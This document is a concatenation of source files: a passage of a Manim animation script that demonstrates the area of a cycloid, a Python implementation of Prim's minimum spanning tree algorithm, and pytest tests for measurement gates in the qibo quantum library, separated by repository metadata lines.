line_group[4-i-1].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8).flip(about_point=start_point + l * 5))
tri_group_04 = VGroup()
for i in range(9):
tri_group_04.add(Polygon(line_group[i].get_start(), start_point + l * (i+1) * RIGHT, line_group[i].get_end(),
color=WHITE, stroke_width=2., fill_color=c4, fill_opacity=0.8))
self.play(FadeIn(tri_group_01))
self.wait()
self.play(FadeIn(tri_group_04))
self.wait()
self.play(ReplacementTransform(tri_group_04[0], tri_group_02[0]), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[1], VGroup(tri_group_02[1], tri_group_03[0])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[2], VGroup(tri_group_02[2], tri_group_03[1])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[3], VGroup(tri_group_02[3], tri_group_03[2])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[4], tri_group_03[3:5]), run_time=1.2)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[5], VGroup(tri_group_02[4], tri_group_03[5])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[6], VGroup(tri_group_02[5], tri_group_03[6])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[7], VGroup(tri_group_02[6], tri_group_03[7])), run_time=0.8)
self.wait(0.24)
self.play(ReplacementTransform(tri_group_04[8], tri_group_02[-1]), run_time=0.8)
self.wait()
## rearrange triangles ##
p_10 = [complex_to_R3(r * np.exp(1j * (TAU/n * i + PI/2))) for i in range(n)]
poly_by_tri_01 = VGroup()
for i in range(n-2):
tri_i = Polygon(p_10[0], p_10[i+1], p_10[i+2],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)
poly_by_tri_01.add(tri_i)
poly_by_tri_02 = poly_by_tri_01.copy().set_fill(color=c2).shift(DOWN * r)
poly_by_tri_03 = poly_by_tri_01.copy().set_fill(color=c3).shift(DOWN * r + RIGHT * r * 2.5)
poly_by_tri_01.shift(DOWN * r + LEFT * r * 2.5)
self.play(TransformFromCopy(tri_group_01, poly_by_tri_01), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_02, poly_by_tri_02), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_03, poly_by_tri_03), run_time=2.25)
self.wait(4)
class Area_by_intergral(Scene):
def construct(self):
text_x = TexMobject('x=r(t-\\sin{t})', color=BLUE).to_corner(LEFT * 2 + UP * 1.5)
text_y = TexMobject('y=r(1-\\cos{t})', color=BLUE).to_corner(LEFT * 2 + UP * 3)
text_t = TexMobject('0\\leqslant t \\leqslant 2\\pi', color=BLUE).to_corner(LEFT * 1.5 + UP * 4.5).scale(0.75)
text_01 = TexMobject('A=\\int^{x=2\\pi r}_{x=0} y dx').to_corner(LEFT * 2 + UP * 7.5)
text_02 = TexMobject('=\\int^{t=2\\pi}_{t=0} r^2(1-\\cos{t})^2 dt').next_to(text_01, RIGHT * 0.5)
text_03 = TexMobject('=r^2({3\\over2}t-2\\sin{t}+{1\\over2}\\cos{t}\\sin{t})', '\\Big|', '^{t=2\\pi}', '_{t=0}').next_to(text_01, DOWN * 1.2).to_corner(LEFT * 2)
# text_03[1].scale([1,2,1]), text_03[2].align_to(text_03[1], UP), text_03[3].align_to(text_03[1], DOWN)
text_04 = TexMobject('=3\\pi r^2').scale(1.1).next_to(text_03, RIGHT * 0.5)
self.play(Write(text_x), run_time=1.2)
self.play(Write(text_y), run_time=1.2)
self.play(Write(text_t), run_time=1.2)
self.wait()
self.play(Write(text_01), run_time=1.5)
self.wait(0.5)
self.play(Write(text_02), run_time=1.8)
self.wait(0.5)
self.play(Write(text_03), run_time=2)
self.wait(0.5)
self.play(Write(text_04), run_time=1.25)
self.wait(5)
class Area_divide_into_rect(Scene):
def construct(self):
r = 1.5
start_point = UP * 0.5 + PI * r * LEFT
curve = ParametricFunction(lambda t: start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]),
t_min=0, t_max=PI * 2, stroke_width=2)
ground_line = Line(UP * 0.5 + LEFT * 6, UP * 0.5 + RIGHT * 6, color=WHITE, stroke_width=2.5)
circle = Circle(radius=r, color=WHITE, stroke_width=2., fill_color=RED, fill_opacity=0.0).move_to((r + 0.5) * UP)
# left part of the area
area_l = Polygon(*([start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]) for t in np.linspace(0, PI, 50)] +
[start_point + r * UP + r * PI * RIGHT + r * np.array([np.cos(t), np.sin(t), 0]) for t in np.linspace(PI/2, 3*PI/2, 50)]),
stroke_width=2, fill_color=BLUE, fill_opacity=0.0)
# right part of the area
area_r = Polygon(*([start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]) for t in np.linspace(2 * PI, PI, 50)] +
[start_point + r * UP + r * PI * RIGHT + r * np.array([np.cos(t), np.sin(t), 0]) for t in np.linspace(PI/2, -PI/2, 50)]),
stroke_width=2, fill_color=YELLOW, fill_opacity=0.0)
s_l, s_m, s_r = area_l.copy().set_fill(opacity=0.8), circle.copy().set_fill(opacity=0.8), area_r.copy().set_fill(opacity=0.8)
formula = TexMobject('S', '=', 'S_{\\text{蓝}}', '+', 'S_{\\text{红}}', '+', 'S_{\\text{黄}}').scale(1.6)
formula[0].set_color(PINK), formula[2].set_color(BLUE), formula[4].set_color(RED), formula[6].set_color(YELLOW)
formula.to_corner(LEFT * 2.5 + UP * 8.5)
rects_7 = self.create_rects(num=7, start_point=start_point, r=1.5)
rects_17 = self.create_rects(num=17, start_point=start_point, r=1.5, stroke_width=0.4)
rects_37 = self.create_rects(num=37, start_point=start_point, r=1.5, stroke_width=0.1)
rects_81 = self.create_rects(num=81, start_point=start_point, r=1.5, stroke_width=0.0).scale([1,1.001,1])
rects_y_7 = rects_7.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_17 = rects_17.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_37 = rects_37.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_81 = rects_81.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
self.add(curve, ground_line)
self.wait(0.8)
self.play(FadeIn(s_l))
self.play(FadeIn(s_m))
self.play(FadeIn(s_r))
self.add(area_l, circle, area_r)
self.wait(0.9)
self.play(Write(formula[0:2]))
self.wait(0.4)
self.play(ReplacementTransform(s_l, formula[2]))
self.play(Write(formula[3]), run_time=0.4)
self.wait(0.25)
self.play(ReplacementTransform(s_m, formula[4]))
self.play(Write(formula[5]), run_time=0.4)
self.wait(0.25)
self.play(ReplacementTransform(s_r, formula[6]))
self.wait(0.8)
self.play(Rotating(area_r, radians=PI, axis=RIGHT, run_time=1.6))
self.wait()
for rect, rect_y in zip(rects_7, rects_y_7): self.play(FadeInFromUp(rect), FadeInFromDown(rect_y), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(rects_7, rects_17), ReplacementTransform(rects_y_7, rects_y_17), run_time=1.5)
self.wait(0.2)
self.play(ReplacementTransform(rects_17, rects_37), ReplacementTransform(rects_y_17, rects_y_37), run_time=1.25)
self.wait(0.2)
self.play(ReplacementTransform(rects_37, rects_81), ReplacementTransform(rects_y_37, rects_y_81), run_time=1.2)
self.wait()
rects_7_new = self.create_rects(num=7, start_point=start_point, r=1.5)
rects_17_new = self.create_rects(num=17, start_point=start_point, r=1.5, stroke_width=0.4)
rects_37_new = self.create_rects(num=37, start_point=start_point, r=1.5, stroke_width=0.1)
rects_81_new = self.create_rects(num=81, start_point=start_point, r=1.5, stroke_width=0.0).scale([1, 1.001, 1])
rects_y_7_new = rects_7_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_17_new = rects_17_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_37_new = rects_37_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_81_new = rects_81_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
area_b = Polygon(*([(np.array([PI * r - r * t, r * (1 - np.cos(t)), 0]) + start_point) for t in np.linspace(0, PI, 100)] + [start_point]),
stroke_width=0.1, stroke_color=BLACK, fill_color=BLUE, fill_opacity=0.8)
area_y = area_b.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
self.play(FadeOut(formula))
start_new = start_point + DOWN * 3.5
ground_line_new = ground_line.copy().shift(DOWN * 3.5)
curve_new = curve.copy().shift(DOWN * 3.5)
init_O = start_new + r * UP
circle_init = circle.copy().move_to(init_O)
circle_new = circle.copy().move_to(init_O)
circle_mid = circle.copy().move_to(init_O + r * PI * RIGHT)
dot_O_init = Dot(init_O, color=YELLOW, plot_depth=1)
dot_O = Dot(init_O, color=YELLOW, plot_depth=1)
dot_O_2 = Dot(init_O + r * PI * RIGHT, color=YELLOW, plot_depth=1)
dot_P_init = Dot(init_O + r * DOWN, color=BLUE, plot_depth=1)
dot_P = Dot(init_O + r * DOWN, color=BLUE, plot_depth=1)
dot_P_2 = Dot(init_O + r * DOWN + r * PI * RIGHT, color=BLUE, plot_depth=1)
line_r_init = Line(dot_O.get_center(), dot_P.get_center(), stroke_width=2.5)
line_r = Line(dot_O.get_center(), dot_P.get_center(), stroke_width=2.5)
line_r_2 = Line(dot_O_2.get_center(), dot_P_2.get_center(), stroke_width=2.5)
line_PP2 = Line(dot_P.get_center(), dot_P_2.get_center(), stroke_width=2.5, color=BLUE)
line_PP_init = DashedLine(dot_P.get_center(), dot_P_init.get_center(), stroke_width=2.5, color=BLUE)
get_t = lambda : (dot_O.get_center()[0] - init_O[0]) / r
get_P = lambda t: np.array([t - np.sin(t), 1 - np.cos(t), 0]) * r
get_P2 = lambda t: np.array([PI - np.sin(t), 1 - np.cos(t), 0]) * r
get_P_init = lambda t: np.array([- np.sin(t), 1 - np.cos(t), 0]) * r
dot_P_init.add_updater(lambda d: d.move_to(start_new + get_P_init(get_t())))
dot_P.add_updater(lambda d: d.move_to(start_new + get_P(get_t())))
dot_P_2.add_updater(lambda d: d.move_to(start_new + get_P2(get_t())))
line_r_init.add_updater(lambda l: l.become(Line(init_O, start_new + get_P_init(get_t()), stroke_width=2.5)))
line_r.add_updater(lambda l: l.become(Line(init_O + r * get_t() * RIGHT, start_new + get_P(get_t()), stroke_width=2.5)))
line_r_2.add_updater(lambda l: l.become(Line(init_O + r * PI * RIGHT, start_new + get_P2(get_t()), stroke_width=2.5)))
line_PP2.add_updater(lambda l: l.become(Line(start_new + get_P(get_t()), start_new + get_P2(get_t()), stroke_width=2.5, color=BLUE)))
line_PP_init.add_updater(lambda l: l.become(DashedLine(start_new + get_P_init(get_t()), start_new + get_P(get_t()), stroke_width=2.5, color=BLUE)))
circle_new.add_updater(lambda c: c.move_to(dot_O))
g1 = VGroup(dot_P, dot_P_2, dot_O, line_r, line_r_2, line_PP2)
self.play(ShowCreation(ground_line_new))
self.play(ShowCreation(curve_new), FadeIn(circle_new))
self.add(circle_init, dot_O_init)
self.wait(0.2)
self.play(FadeIn(dot_O))
self.play(FadeIn(dot_P), FadeIn(line_r))
self.wait(0.4)
self.play(ShowCreation(dot_O_2), run_time=0.4)
dash_line = DashedLine(init_O, dot_O_2.get_center(), color=YELLOW, stroke_width=2.5, plot_depth=0.5)
self.play(ShowCreation(dash_line))
self.wait(0.4)
self.play(dot_O.shift, r * PI * RIGHT, run_time=2.5)
self.play(FadeIn(dot_P_init), ShowCreation(line_r_init), ShowCreation(line_PP_init))
self.add(dot_O_2, dot_P_2, line_r_2, line_PP2, circle_mid)
self.wait(0.75)
self.play(dot_O.shift, -0.36 * r * PI * RIGHT, rate_func=linear, run_time=3.6)
g2 = g1.copy().suspend_updating()
self.add(g2)
self.play(dot_O.shift, -0.28 * r * PI * RIGHT, rate_func=linear, run_time=2.8)
angle_1 = Angle(dot_O.get_center(), dot_O_2.get_center(), g2[1].get_center(), radius=0.5, color=YELLOW)
angle_2 = Angle(dot_O.get_center(), dot_O_2.get_center(), g1[1].get_center(), radius=0.5, color=YELLOW)
angle_3 = Angle(dot_O_init.get_center(), g2[2].get_center(), g2[0].get_center(), radius=0.5, color=YELLOW)
angle_4 = Angle(dot_O_init.get_center(), dot_O.get_center(), g1[0].get_center(), radius=0.5, color=YELLOW)
self.play(ShowCreation(angle_1), ShowCreation(angle_2))
self.play(ShowCreation(angle_3), ShowCreation(angle_4))
self.wait(0.8)
line_down = Line(line_PP2.get_start(), line_PP2.get_end(), color=BLUE, stroke_opacity=0.5, stroke_width=16)
line_up = Line(g2[5].get_start(), g2[5].get_end(), color=BLUE, stroke_opacity=0.5, stroke_width=16)
# line_down.set_plot_depth(2), line_up.set_plot_depth(2)
# line_down.suspend_updating(), line_up.suspend_updating()
brace = Brace(dash_line, DOWN, color=RED)
tex = brace.get_tex('\\pi r').set_color(RED)
tex.scale(1.5) # .shift(UP * 0.05)
self.play(ShowCreation(line_down))
self.play(ShowCreation(line_up))
self.wait(0.4)
self.play(line_down.shift, dot_O.get_center() - dot_P.get_center(), rate_func=linear, run_time=1.2)
self.wait(0.4)
self.play(line_up.shift, init_O - g2[0].get_center(), rate_func=linear, run_time=1.2)
self.wait(0.6)
self.play(FadeInFromDown(brace))
self.play(Write(tex))
self.wait(0.8)
explain_text = Text('距黄虚线相等的上下两\n'
'蓝色线的总和固定(πr)', font='思源黑体 Bold')
t2c = {'黄虚线': YELLOW, '蓝色线': BLUE, 'πr':RED}
explain_text.set_color_by_t2c(t2c)
explain_text.scale(0.5).next_to(dot_O_2, RIGHT * 2.4)
self.play(Write(explain_text), run_time=3)
self.play(ShowCreation(SurroundingRectangle(explain_text)), run_time=1.2)
self.wait()
self.play(ReplacementTransform(rects_81, rects_7_new), ReplacementTransform(rects_y_81, rects_y_7_new))
for rect, rect_y in zip(rects_7_new, rects_y_7_new): self.play(rect.align_to, rects_7, LEFT, rect_y.align_to, rects_y_7, RIGHT, run_time=0.4)
self.wait(0.8)
self.play(FadeOut(rects_7_new), FadeOut(rects_y_7_new), FadeIn(rects_17_new), FadeIn(rects_y_17_new), rate_func=linear, run_time=0.9)
for rect, rect_y in zip(rects_17_new, rects_y_17_new): self.play(rect.align_to, rects_17, LEFT, rect_y.align_to, rects_y_17, RIGHT, run_time=0.32)
self.wait(0.8)
self.play(FadeOut(rects_17_new), FadeOut(rects_y_17_new), FadeIn(rects_37_new), FadeIn(rects_y_37_new), rate_func=linear, run_time=0.9)
for rect, rect_y in zip(rects_37_new, rects_y_37_new): self.play(rect.align_to, rects_37, LEFT, rect_y.align_to, rects_y_37, RIGHT, run_time=0.2)
self.wait(1.)
for rect, rect_y in zip(rects_81_new, rects_y_81_new):
rect.align_to(rects_81_new, LEFT)
rect_y.align_to(rects_y_81_new, RIGHT)
self.play(ReplacementTransform(rects_37_new, rects_81_new), ReplacementTransform(rects_y_37_new, rects_y_81_new), run_time=1.2)
self.wait(0.4)
self.play(FadeOut(rects_81_new), FadeIn(area_b), FadeOut(rects_y_81_new), FadeIn(area_y), rate_func=linear, run_time=1.25)
self.wait(1.2)
self.play(area_y.shift, PI * r * LEFT, run_time=1.2)
self.wait(1)
tex2color = {'S_{\\text{蓝}}': BLUE, 'S_{\\text{黄}}': YELLOW, 'S_{\\text{红}}': RED,
'2r': RED, '\\pi r': RED, '2\\pi r^2': RED, '3\\pi r^2': PINK, 'S': PINK}
formula_02 = TexMobject('S_{\\text{蓝}}', '+ ', 'S_{\\text{黄}}', '=', '2r', '\\times', '\\pi r', plot_depth=5)
# formula_02.set_color_by_tex_to_color_map(tex2color)
formula_02[0].set_color(BLUE), formula_02[2].set_color(YELLOW), formula_02[4].set_color(RED), formula_02[6].set_color(RED),
formula_02.scale(1.5).next_to(area_y, RIGHT * 2.5)
formula_02_2 = TexMobject('S_{\\text{蓝}}', '+ ', 'S_{\\text{黄}}', '=', '2\\pi r^2', plot_depth=5)
# formula_02_2.set_color_by_tex_to_color_map(tex2color)
formula_02_2[0].set_color(BLUE), formula_02_2[2].set_color(YELLOW), formula_02_2[4].set_color(RED)
formula_02_2.scale(1.5).next_to(area_y, RIGHT * 2.5)
formula_03 = TexMobject('\\therefore', 'S', '=', 'S_{\\text{蓝}}', '+', 'S_{\\text{黄}}', '+', 'S_{\\text{红}}', '=', '3\\pi r^2', plot_depth=5)
# formula_03.set_color_by_tex_to_color_map(tex2color)
formula_03[1].set_color(PINK), formula_03[3].set_color(BLUE), formula_03[5].set_color(YELLOW), formula_03[7].set_color(RED), formula_03[9].set_color(PINK)
formula_03.scale(1.6).to_corner(LEFT * 2.5 + UP * 8.75)
self.play(Write(formula_02), run_time=1.5)
self.wait(0.8)
self.play(ReplacementTransform(formula_02, formula_02_2), run_time=1.5)
self.wait(0.4)
self.play(ShowCreation(SurroundingRectangle(formula_02, plot_depth=3)), run_time=1.2)
self.wait(1.5)
mask_rect = Rectangle(color=BLACK, fill_color=BLACK, fill_opacity=1, plot_depth=3).scale([10, 4, 1]).align_to(ORIGIN, UP)
self.play(FadeIn(mask_rect), run_time=1.2)
self.wait()
self.play(Write(formula_03[0:8]), run_time=2.5)
self.wait(0.2)
self.play(Write(formula_03[8:10]))
self.wait(4)
def create_rects(self, num=7, r=1, start_point=ORIGIN, color=BLUE, stroke_width=0.5):
x = lambda t: r * (t - np.sin(t))
# y = lambda t: r * (1 - np.cos(t))
x_c = lambda t: r * PI - r * np.sin(t) + 1e-3
t = lambda y: np.arccos(1 - y/r)
rects = VGroup()
h = 2 * r / num
s = start_point
for i in range(num):
h_i = h * i
x_l, x_r = x(t(h_i)), x_c(t(h_i))
rect_i = Polygon(s + x_l * RIGHT + h_i * UP, s + x_r * RIGHT + h_i * UP,
s + x_r * RIGHT + (h_i + h) * UP, s + x_l * RIGHT + (h_i + h) * UP,
fill_color=color, fill_opacity=0.8, stroke_width=stroke_width, stroke_color=BLACK)
rects.add(rect_i)
return rects
class Text(Scene):
'''Area_divide_into_rect这个场景后面的动画有一点小问题,不想重新再渲染了,用这个场景在后期修补下'''
def construct(self):
formula_03 = TexMobject('\\therefore', 'S', '=', 'S_{\\text{蓝}}', '+', 'S_{\\text{黄}}', '+', 'S_{\\text{红}}', '=', '3\\pi r^2', plot_depth=5)
# formula_03.set_color_by_tex_to_color_map(tex2color)
formula_03[1].set_color(PINK), formula_03[3].set_color(BLUE), formula_03[5].set_color(YELLOW), formula_03[7].set_color(RED), formula_03[9].set_color(PINK)
formula_03.scale(1.6).to_corner(LEFT * 2.5 + UP * 8.75)
self.play(Write(formula_03[0:8]), run_time=2.5)
self.wait(0.2)
self.play(Write(formula_03[8:10]))
self.wait(4)
class Ending(Scene):
"""用来骗三连的结尾"""
def construct(self):
r = 1.45
start_point = DOWN * r + PI * r * LEFT
init_O = start_point + r * UP
curve = ParametricFunction(lambda t: start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]),
t_min=0, t_max=PI * 2, stroke_width=2)
# get_t = lambda : (dot_O.get_center()[0] - init_O[0]) / r
get_P = lambda t: np.array([t - np.sin(t), 1 - np.cos(t), 0]) * r
area = Polygon(*[init_O + r * DOWN + get_P(t) for t in np.linspace(0, TAU, 100)],
fill_color=YELLOW, fill_opacity=0.95, stroke_width=0)
circle_01 = Circle(radius=r-0.1, stroke_width=20, color=PINK, fill_color=PINK, fill_opacity=1).move_to(LEFT * 2.75 * r)
circle_02 = Circle(radius=r-0.1, stroke_width=20, color=BLUE, fill_color=BLUE, fill_opacity=1).move_to(LEFT * 0)
circle_03 = Circle(radius=r-0.1, stroke_width=20, color=ORANGE, fill_color=ORANGE, fill_opacity=1).move_to(RIGHT * 2.75 * r)
circle_11, circle_12, cirlce_13 = circle_01.copy().set_fill(opacity=0), circle_02.copy().set_fill(opacity=0), circle_03.copy().set_fill(opacity=0)
path = 'my_manim_projects\\my_projects\\resource\\svg_files\\'
good = SVGMobject(path + 'good.svg', color=PINK).set_width(0.7 * 2 * r).move_to(circle_01).shift(UR * 0.06)
coin = SVGMobject(path + 'coin.svg', color=BLUE).set_height(0.7 * 2 * r).move_to(circle_02)
favo = SVGMobject(path + 'favo.svg', color=ORANGE).set_height(0.7 * 2 * r).move_to(circle_03).shift(UR * 0.05)
self.play(FadeInFromLarge(area), run_time=0.8)
# self.play(WiggleOutThenIn(area), run_time=0.8)
self.wait(0.8)
self.play(ReplacementTransform(area, VGroup(circle_01, circle_02, circle_03)), run_time=0.9)
self.wait(2.5)
self.add(circle_11, circle_12, cirlce_13)
self.play(ReplacementTransform(circle_01, good), ReplacementTransform(circle_02, coin),
ReplacementTransform(circle_03, favo), run_time=2)
self.wait()
self.play(WiggleOutThenIn(good), WiggleOutThenIn(coin), WiggleOutThenIn(favo), run_time=2)
self.wait(5)
|
2c1b2271e8643767e3038c06e92b0a7b1f0f2839
|
2753608f87a1e8fa312feced7af20917ea9cc004
|
/Graphs/Prims Algorithm/Prims/Prims.py
|
56efa901a559afbf6dd56c47cc9da523c1f5dd9f
|
[
"MIT"
] |
permissive
|
VAR-solutions/Algorithms
|
76faed6515367b6f27638b910dbc07f340fae56f
|
4ad6773e9675ef35aa858ca3969be5ddf6e3daea
|
refs/heads/dev
| 2023-08-15T11:37:26.048316
| 2021-08-03T07:00:28
| 2021-08-03T07:00:28
| 151,157,582
| 794
| 1,249
|
MIT
| 2023-07-29T00:28:36
| 2018-10-01T20:50:24
|
C++
|
UTF-8
|
Python
| false
| false
| 1,628
|
py
|
Prims.py
|
import random
import math
import numpy as np
# Prim's Minimum Spanning Tree Algorithm
def primsAlgo(e,c,n):
sel_edge = ()
mincost = 0
near = [0 for x in range(n)]
t = [[0 for x in range(2)] for y in range(n-1)]
print('Initially Minimum Spanning Tree: \n' ,np.matrix(t))
values = np.array(c)
index = np.argmin(values)
minedge = [index//n, index%n]
sel_edge = minedge
mincost += c[sel_edge[0]][sel_edge[1]]
#Select neighboring edge with minimum cost
t[0][0],t[0][1] = sel_edge[0],sel_edge[1]
for l in range(0,n):
if(c[l][sel_edge[0]] < c[l][sel_edge[1]]):
near[l] = sel_edge[0]
else:
near[l] = sel_edge[1]
near[sel_edge[0]],near[sel_edge[1]] = -1,-1
minm = math.inf
for i in range(1,n-1):
for j in range(n):
if(near[j] != -1):
if(c[j][near[j]] < minm):
minm = c[j][near[j]]
sel_edge[0] = j
sel_edge[1] = near[j]
minm = math.inf
t[i][0],t[i][1] = sel_edge[0],sel_edge[1]
mincost += c[sel_edge[0]][sel_edge[1]]
near[sel_edge[0]] = -1
for k in range(n):
if(near[k] != -1 and (c[k][near[k]] > c[k][sel_edge[0]])):
near[k] = sel_edge[0]
print('Resultant MST: \n', np.matrix(t))
return mincost
n = random.randint(5,7)
print('Number of vertices:', n)
max_int = math.inf
e = [[0 for x in range(n)] for y in range(n)]
c = [[max_int for x in range(n)] for y in range(n)]
for i in range(n):
for j in range(n):
if(i < j):
e[i][j]=1
c[i][j]=float(random.randint(10,50))
else:
e[i][j]=e[j][i]
c[i][j]=c[j][i]
print('Edge Adjacency Matrix: \n', np.matrix(e))
print('Cost Adjacency Matrix: \n',np.matrix(c))
print ('Cost of MST: ', primsAlgo(e,c,n))
|
2a9c2af9e8adaf898f8a46b2cf393d27aab42dda
|
e9420977fc5540967c6602520272a5b73bb57e98
|
/tests/test_measurements.py
|
3b0bcea4d5afde7e6ca1c28b1bff4f86f3781792
|
[
"Apache-2.0"
] |
permissive
|
qiboteam/qibo
|
2c8d4820ca4e7a6ac315b44338b0cd072b51e857
|
76ad26f356a1831553818a3082cc669f042945b2
|
refs/heads/master
| 2023-09-05T07:39:50.695080
| 2023-08-24T16:47:30
| 2023-08-24T16:47:30
| 241,307,936
| 150
| 41
|
Apache-2.0
| 2023-09-14T10:09:25
| 2020-02-18T08:21:10
|
Python
|
UTF-8
|
Python
| false
| false
| 13,874
|
py
|
test_measurements.py
|
"""Test circuit result measurements and measurement gate and as part of circuit."""
import numpy as np
import pytest
from qibo import gates, models
def assert_result(
backend,
result,
decimal_samples=None,
binary_samples=None,
decimal_frequencies=None,
binary_frequencies=None,
):
if decimal_frequencies is not None:
assert result.frequencies(False) == decimal_frequencies
if binary_frequencies is not None:
assert result.frequencies(True) == binary_frequencies
if decimal_samples is not None:
backend.assert_allclose(result.samples(False), decimal_samples)
if binary_samples is not None:
backend.assert_allclose(result.samples(True), binary_samples)
def assert_dicts_equal(backend, d1, d2):
assert d1.keys() == d2.keys()
for k, v in d1.items():
if isinstance(v, dict):
assert v == d2[k]
else:
backend.assert_allclose(v, d2[k])
def assert_register_result(
backend,
result,
decimal_samples=None,
binary_samples=None,
decimal_frequencies=None,
binary_frequencies=None,
):
if decimal_samples:
register_result = result.samples(binary=False, registers=True)
assert_dicts_equal(backend, register_result, decimal_samples)
if binary_samples:
register_result = result.samples(binary=True, registers=True)
assert_dicts_equal(backend, register_result, binary_samples)
if decimal_frequencies:
register_result = result.frequencies(binary=False, registers=True)
assert_dicts_equal(backend, register_result, decimal_frequencies)
if binary_frequencies:
register_result = result.frequencies(binary=True, registers=True)
assert_dicts_equal(backend, register_result, binary_frequencies)
@pytest.mark.parametrize("n", [0, 1])
@pytest.mark.parametrize("nshots", [100, 1000000])
def test_measurement_gate(backend, n, nshots):
c = models.Circuit(2)
if n:
c.add(gates.X(1))
c.add(gates.M(1))
result = backend.execute_circuit(c, nshots=nshots)
assert_result(
backend,
result,
n * np.ones(nshots),
n * np.ones((nshots, 1)),
{n: nshots},
{str(n): nshots},
)
def test_multiple_qubit_measurement_gate(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.M(0, 1))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 0] = 1
assert_result(
backend,
result,
2 * np.ones((100,)),
target_binary_samples,
{2: 100},
{"10": 100},
)
def test_measurement_gate_errors(backend):
gate = gates.M(0)
# attempting to use `controlled_by`
with pytest.raises(NotImplementedError):
gate.controlled_by(1)
# attempting to construct unitary
with pytest.raises(NotImplementedError):
matrix = gate.matrix(backend)
def test_measurement_circuit(backend, accelerators):
c = models.Circuit(4, accelerators)
c.add(gates.X(0))
c.add(gates.M(0))
result = backend.execute_circuit(c, nshots=100)
assert_result(
backend, result, np.ones((100,)), np.ones((100, 1)), {1: 100}, {"1": 100}
)
@pytest.mark.parametrize("registers", [False, True])
def test_measurement_qubit_order_simple(backend, registers):
c = models.Circuit(2)
c.add(gates.X(0))
if registers:
c.add(gates.M(1, 0))
else:
c.add(gates.M(1))
c.add(gates.M(0))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 1] = 1
assert_result(
backend, result, np.ones(100), target_binary_samples, {1: 100}, {"01": 100}
)
@pytest.mark.parametrize("nshots", [100, 1000000])
def test_measurement_qubit_order(backend, accelerators, nshots):
c = models.Circuit(6, accelerators)
c.add(gates.X(0))
c.add(gates.X(1))
c.add(gates.M(1, 5, 2, 0))
result = backend.execute_circuit(c, nshots=nshots)
target_binary_samples = np.zeros((nshots, 4))
target_binary_samples[:, 0] = 1
target_binary_samples[:, 3] = 1
assert_result(
backend,
result,
9 * np.ones(nshots),
target_binary_samples,
{9: nshots},
{"1001": nshots},
)
def test_multiple_measurement_gates_circuit(backend):
c = models.Circuit(4)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.M(0, 1))
c.add(gates.M(2))
c.add(gates.X(3))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.ones((100, 3))
target_binary_samples[:, 0] = 0
assert_result(
backend, result, 3 * np.ones(100), target_binary_samples, {3: 100}, {"011": 100}
)
def test_circuit_with_unmeasured_qubits(backend, accelerators):
c = models.Circuit(5, accelerators)
c.add(gates.X(4))
c.add(gates.X(2))
c.add(gates.M(0, 2))
c.add(gates.X(3))
c.add(gates.M(1, 4))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 4))
target_binary_samples[:, 1] = 1
target_binary_samples[:, 3] = 1
assert_result(
backend,
result,
5 * np.ones(100),
target_binary_samples,
{5: 100},
{"0101": 100},
)
def test_circuit_addition_with_measurements(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.X(1))
meas_c = models.Circuit(2)
c.add(gates.M(0, 1))
c += meas_c
result = backend.execute_circuit(c, nshots=100)
assert_result(
backend,
result,
3 * np.ones(100),
np.ones((100, 2)),
{3: 100},
{"11": 100},
)
def test_circuit_addition_with_measurements_in_both_circuits(backend, accelerators):
c1 = models.Circuit(4, accelerators)
c1.add(gates.X(0))
c1.add(gates.X(1))
c1.add(gates.M(1, register_name="a"))
c2 = models.Circuit(4, accelerators)
c2.add(gates.X(0))
c2.add(gates.M(0, register_name="b"))
c = c1 + c2
result = backend.execute_circuit(c, nshots=100)
assert_result(
backend,
result,
binary_frequencies={"10": 100},
)
def test_circuit_copy_with_measurements(backend, accelerators):
c1 = models.Circuit(6, accelerators)
c1.add([gates.X(0), gates.X(1), gates.X(3)])
c1.add(gates.M(5, 1, 3, register_name="a"))
c1.add(gates.M(2, 0, register_name="b"))
c2 = c1.copy(deep=True)
r1 = backend.execute_circuit(c1, nshots=100)
r2 = backend.execute_circuit(c2, nshots=100)
backend.assert_allclose(r1.samples(), r2.samples())
rg1 = r1.frequencies(registers=True)
rg2 = r2.frequencies(registers=True)
assert rg1.keys() == rg2.keys()
for k in rg1.keys():
assert rg1[k] == rg2[k]
